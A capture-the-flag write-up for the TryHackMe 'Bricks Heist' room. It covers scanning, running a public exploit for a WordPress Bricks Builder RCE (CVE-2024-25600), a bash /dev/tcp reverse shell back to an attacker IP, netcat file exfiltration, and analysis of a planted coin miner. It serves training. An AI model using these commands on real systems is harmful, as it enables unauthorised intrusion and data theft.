
TryHack3M: Bricks Heist

1. Initial Target Setup and Port Scanning

Set Up Host Resolution

First, we map the target's IP to a hostname in /etc/hosts so the machine can be referenced by name:

# /etc/hosts
TARGET_IP bricks.thm

Define the Target IP and Perform a Fast Full Port Scan

We export the target IP as an environment variable and use Nmap to quickly scan all TCP ports on the target:

export TARGET_IP=10.10.105.128
nmap -p- -Pn --min-rate 5000 $TARGET_IP

Nmap Results Summary:

Not shown: 65409 closed tcp ports (reset), 122 filtered tcp ports (no-response)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
443/tcp open https
3306/tcp open mysql

2. Service Version Detection and Enumeration

We further probe the most interesting ports (80, 443, and 3306) using version detection (-sV) and default scripts (-sC):

nmap -p80,443,3306 -Pn -sV -sC $TARGET_IP

Interpreting the Output:

PORT     STATE SERVICE  VERSION
80/tcp   open  http     Python http.server 3.5 - 3.10
|_http-server-header: WebSockify Python/3.8.10
|_http-title: Error response
443/tcp  open  ssl/http Apache httpd
|_http-generator: WordPress 6.5
| http-robots.txt: 1 disallowed entry
|_/wp-admin/
|_http-server-header: Apache
3306/tcp open  mysql    MySQL (unauthorized)

Key Points:

  • Port 80: Runs a Python HTTP server.
  • Port 443: Runs Apache with WordPress 6.5. The robots.txt disallows access to /wp-admin/.
  • Port 3306: MySQL is reachable from the network; Nmap labels it (unauthorized), which points to a likely misconfiguration.

3. Exploiting a Known Vulnerability

Identifying the Vulnerability

A look at the page source reveals that the site uses the WordPress Bricks Builder theme (dated 2024/04/02). Research turns up CVE-2024-25600, an unauthenticated Remote Code Execution (RCE) vulnerability in that theme: an attacker can execute arbitrary code on the server without needing to authenticate.

Exploitation Steps

Clone the public exploit repository and run the script:

git clone https://github.com/Chocapikk/CVE-2024-25600
cd CVE-2024-25600
pip install -r requirements.txt
python3 exploit.py -u "https://bricks.thm"

If successful, you should see a shell running as the Apache user:

id
# uid=1001(apache) gid=1001(apache) groups=1001(apache)

Explanation: The exploit abuses the RCE vulnerability in the Bricks Builder theme, yielding command execution on the server as the web server user (apache).


4. Upgrading to a Reverse Shell

Since the initial shell is awkward to work in, we establish a cleaner reverse shell connection.

On Your Local Machine (Listener):

nc -lvnp 6666

On the Target Machine (Connect Back):

bash -c 'sh -i >& /dev/tcp/10.2.17.44/6666 0>&1'

Sanitizing the Terminal

Sometimes the reverse shell terminal can be garbled. Use the following commands to clean it up:

script /dev/null -c bash
# (Then press CTRL+Z to background the current process)
stty raw -echo; fg
reset xterm
export TERM=xterm
export SHELL=/bin/bash
stty size # Run this in your local terminal to read its size (rows and columns)
stty rows <ROWS> columns <COLUMNS> # Then set the same size inside the reverse shell

Explanation:
These commands reinitialize your shell and terminal settings to ensure proper display and input handling.


5. Post-Exploitation: Investigating for Persistence and Malicious Activity

Check for Unusual Services

Look for running services that might be used for persistence or indicate additional compromise:

systemctl list-units --type=service --state=running

Example output:

ubuntu.service       loaded active running TRYHACK3M

Inspect the Suspect Service

View the details of the service:

systemctl cat ubuntu.service

Output:

ExecStart=/lib/NetworkManager/nm-inet-dialog

Change directory to inspect files related to this binary:

cd /lib/NetworkManager/
ls -al

You might see:

-rw-r--r-- 1 root root   48190 Apr 11 2024 inet.conf       # Log file
-rwxr-xr-x 1 root root 6948448 Apr  8 2024 nm-inet-dialog  # Binary

Examine the Log File

Check the beginning of inet.conf:

head inet.conf

Example output:

ID: 5757314e65474e5962484a4f656d787457544e424e574648555446684d3070735930684b616c70555a7a566b52335276546b686b65575248647a525a57466f77546b64334d6b347a526d685a6255313459316873636b35366247315a4d304531595564476130355864486c6157454a3557544a564e453959556e4a685246497a5932355363303948526a4a6b52464a7a546d706b65466c525054303d
2024-04-08 10:46:04,743 [*] confbak: Ready!
2024-04-08 10:46:04,743 [*] Status: Mining!
...

Observation:
The log indicates that a Bitcoin mining operation was started.


6. Analyzing the Suspect Binary

Check the Binary File Type:

file nm-inet-dialog

Output:

nm-inet-dialog: ELF 64-bit LSB executable, x86-64, dynamically linked, stripped

Explanation:
This shows that nm-inet-dialog is a stripped (symbol table removed) 64-bit Linux ELF binary, which makes reverse engineering harder.

Decoding an Embedded String

The log file begins with a long hexadecimal string. A helper script (triple_decoder.py) decodes it by:

  1. Converting from hex to bytes.
  2. Applying two rounds of Base64 decoding.

triple_decoder.py:

import base64

def hex_then_double_base64_decode(hex_string):
    """
    Decodes a hex string, then performs two rounds of Base64 decoding.
    """
    try:
        # Step 1: Convert hex to bytes
        byte_data = bytes.fromhex(hex_string)
        # Step 2: First Base64 decode
        decoded_data_1 = base64.b64decode(byte_data)
        # Step 3: Second Base64 decode
        final_decoded_data = base64.b64decode(decoded_data_1)
        return final_decoded_data.decode('utf-8')
    except ValueError as e:
        # bytes.fromhex, b64decode (binascii.Error) and .decode() all raise ValueError subclasses
        return f"Error: Invalid input - {e}"
    except Exception as e:
        return f"An unexpected error occurred: {e}"

hex_input = input("Enter the hexadecimal string: ")
decoded_string = hex_then_double_base64_decode(hex_input)
print(decoded_string)

Run the Script:

python3 triple_decoder.py

Input the long hexadecimal string (from the log) when prompted:

5757314e65474e5962484a4f656d787457544e424e574648555446684d3070735930684b616c70555a7a566b52335276546b686b65575248647a525a57466f77546b64334d6b347a526d685a6255313459316873636b35366247315a4d304531595564476130355864486c6157454a3557544a564e453959556e4a685246497a5932355363303948526a4a6b52464a7a546d706b65466c525054303d

Output:

bc1qyk79fcp9hd5kreprce89tkh4wrtl8avt4l67qabc1qyk79fcp9had5kreprce89tkh4wrtl8avt4l67qa

Observation:
The decoded string appears to be a Bech32 Bitcoin address (starts with “bc1q”) repeated twice. Although research did not reveal this as a real wallet, it is a hint linking this activity to the LockBit Ransomware Group.
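The "appears to be a Bech32 address" observation can be tested rather than eyeballed. The following script is an added example, not part of the original write-up or the challenge: it implements the BIP173 bech32 checksum (and the BIP350 bech32m constant for witness versions above 0), splits the decoded blob into its two "bc1..." candidates, and reports for each whether it is structurally a valid segwit address and why not if it is not. The DECODED_LOG_STRING constant is the string recovered above; the BIP173 test vector used in the usage note is the well-known P2WPKH example from that specification.

```python
import re

# Added example (not from the write-up or the challenge): structural and checksum
# checks for bech32/bech32m segwit addresses per BIP173/BIP350.

CHARSET = "qpzry9x8gf2tvdw0s3jn54khce6mua7l"
GENERATOR = (0x3B6A57B2, 0x26508E6D, 0x1EA119FA, 0x3D4233DD, 0x2A1462B3)
BECH32_CONST, BECH32M_CONST = 1, 0x2BC830A3

# String the write-up decoded from the miner's log (two concatenated candidates).
DECODED_LOG_STRING = (
    "bc1qyk79fcp9hd5kreprce89tkh4wrtl8avt4l67qa"
    "bc1qyk79fcp9had5kreprce89tkh4wrtl8avt4l67qa"
)


def bech32_polymod(values):
    """BIP173 BCH checksum over a sequence of 5-bit values."""
    chk = 1
    for v in values:
        top = chk >> 25
        chk = ((chk & 0x1FFFFFF) << 5) ^ v
        for i, g in enumerate(GENERATOR):
            if (top >> i) & 1:
                chk ^= g
    return chk


def hrp_expand(hrp):
    """Human-readable part expanded the way the checksum expects it."""
    return [ord(c) >> 5 for c in hrp] + [0] + [ord(c) & 31 for c in hrp]


def convertbits(data, frombits, tobits, pad=True):
    """Regroup bits (5-bit groups -> bytes here); None if padding rules are violated."""
    acc, bits, out = 0, 0, []
    maxv = (1 << tobits) - 1
    for value in data:
        acc = (acc << frombits) | value
        bits += frombits
        while bits >= tobits:
            bits -= tobits
            out.append((acc >> bits) & maxv)
    if pad:
        if bits:
            out.append((acc << (tobits - bits)) & maxv)
    elif bits >= frombits or ((acc << (tobits - bits)) & maxv):
        return None
    return out


def analyze_segwit_address(addr):
    """Describe why a lowercase candidate is or is not a valid segwit address."""
    res = {"address": addr, "valid": False, "reason": "", "version": None, "program_hex": None}
    if addr != addr.lower() or len(addr) > 90 or "1" not in addr:
        res["reason"] = "mixed case, too long, or no '1' separator"
        return res
    sep = addr.rfind("1")  # '1' is not a bech32 digit, so the last one is the separator
    hrp, data_part = addr[:sep], addr[sep + 1:]
    if hrp not in ("bc", "tb"):
        res["reason"] = f"unexpected human-readable part {hrp!r}"
        return res
    if len(data_part) < 7 or any(c not in CHARSET for c in data_part):
        res["reason"] = "data part too short or contains a non-bech32 character"
        return res
    data = [CHARSET.index(c) for c in data_part]
    version = data[0]
    res["version"] = version
    if version > 16:
        res["reason"] = f"witness version {version} out of range"
        return res
    expected = BECH32_CONST if version == 0 else BECH32M_CONST
    if bech32_polymod(hrp_expand(hrp) + data) != expected:
        res["reason"] = "checksum mismatch"
        return res
    program = convertbits(data[1:-6], 5, 8, pad=False)  # drop version and 6 checksum chars
    if program is None:
        res["reason"] = "witness program has invalid padding"
        return res
    if version == 0 and len(program) not in (20, 32):
        res["reason"] = f"v0 program must be 20 or 32 bytes, got {len(program)}"
        return res
    if not 2 <= len(program) <= 40:
        res["reason"] = f"program length {len(program)} out of range"
        return res
    res["valid"] = True
    res["program_hex"] = bytes(program).hex()
    return res


def split_candidates(blob):
    """Pull every 'bc1...' run out of a decoded blob; 'b' is not a bech32 digit,
    so back-to-back addresses split cleanly."""
    return re.findall(r"bc1[" + CHARSET + r"]+", blob)


if __name__ == "__main__":
    for cand in split_candidates(DECODED_LOG_STRING):
        r = analyze_segwit_address(cand)
        print(f"{cand} ({len(cand)} chars): valid={r['valid']} {r['reason']}")
```

Running it shows the blob splits into a 42-character and a 43-character candidate. The second cannot be a valid v0 address regardless of its checksum: its 33 data characters carry 165 bits, which violates the padding rule for a 20-byte program. Sanity-check the validator itself with the BIP173 vector bc1qw508d6qejxtdg4y5r3zarvary0c5xw7kv8f3t4, which decodes to version 0 and program 751e76e8199196d454941c45d1b3a323f1433bd6; changing any single character is reported as a checksum mismatch.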


7. Exfiltrating the Binary for Offline Analysis

To keep a pristine copy of the binary, transfer it off the target for further offline analysis (e.g., on VirusTotal or in a dedicated reverse engineering environment).

Transfer via Netcat:

On the Receiver (Local Machine):

nc -lvnp 6666 > nm-inet-dialog

On the Sender (Target Machine):

nc 10.2.17.44 6666 < nm-inet-dialog

This simple Netcat transfer allows you to safely extract the suspect binary for detailed analysis. Subsequent testing (e.g., on VirusTotal) confirmed that the binary is indeed a coin miner.
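A raw Netcat transfer gives no feedback if the stream is cut short, so hash the file on both sides before trusting the copy. The script below is an added example, not part of the original write-up: it streams a SHA-256 over a file, compares the original with the received copy, and demonstrates on constructed data how a truncated copy is caught. On the target the equivalent one-liner is sha256sum nm-inet-dialog; the resulting hash is also what you search for on VirusTotal, which avoids uploading the sample at all. The file names and the sample bytes are constructed for the demo; the real binary's hash is not given on this page.

```python
import hashlib
import os
import tempfile

# Added example (not part of the original write-up): verify a file copied off a
# host by comparing SHA-256 digests of the original and the received copy.


def sha256_file(path, chunk_size=1 << 20):
    """Stream the file in chunks so large binaries never need to fit in memory."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()


def verify_transfer(original_path, received_path):
    """True only if the received copy hashes identically to the original."""
    return sha256_file(original_path) == sha256_file(received_path)


def hash_of_temp_copy(data):
    """Write constructed bytes to a temporary file and return its SHA-256."""
    with tempfile.TemporaryDirectory() as tmp:
        path = os.path.join(tmp, "sample.bin")
        with open(path, "wb") as fh:
            fh.write(data)
        return sha256_file(path)


def demo():
    """Constructed sample: a fake ELF-looking blob, a complete copy, and a copy cut
    short the way an interrupted 'nc < file' transfer would leave it.
    Returns (complete_copy_ok, truncated_copy_ok)."""
    payload = b"\x7fELF" + bytes(range(256)) * 64  # constructed stand-in, not the real binary
    with tempfile.TemporaryDirectory() as tmp:
        original = os.path.join(tmp, "nm-inet-dialog")
        complete = os.path.join(tmp, "nm-inet-dialog.complete")
        truncated = os.path.join(tmp, "nm-inet-dialog.truncated")
        for path, content in ((original, payload), (complete, payload), (truncated, payload[:-100])):
            with open(path, "wb") as fh:
                fh.write(content)
        return verify_transfer(original, complete), verify_transfer(original, truncated)


if __name__ == "__main__":
    print("complete copy ok, truncated copy ok:", demo())
```

Record the hash taken on the target in your notes before the transfer; if the two digests differ, resend rather than analyze a partial file, since a truncated ELF can behave very differently in a sandbox from the real one.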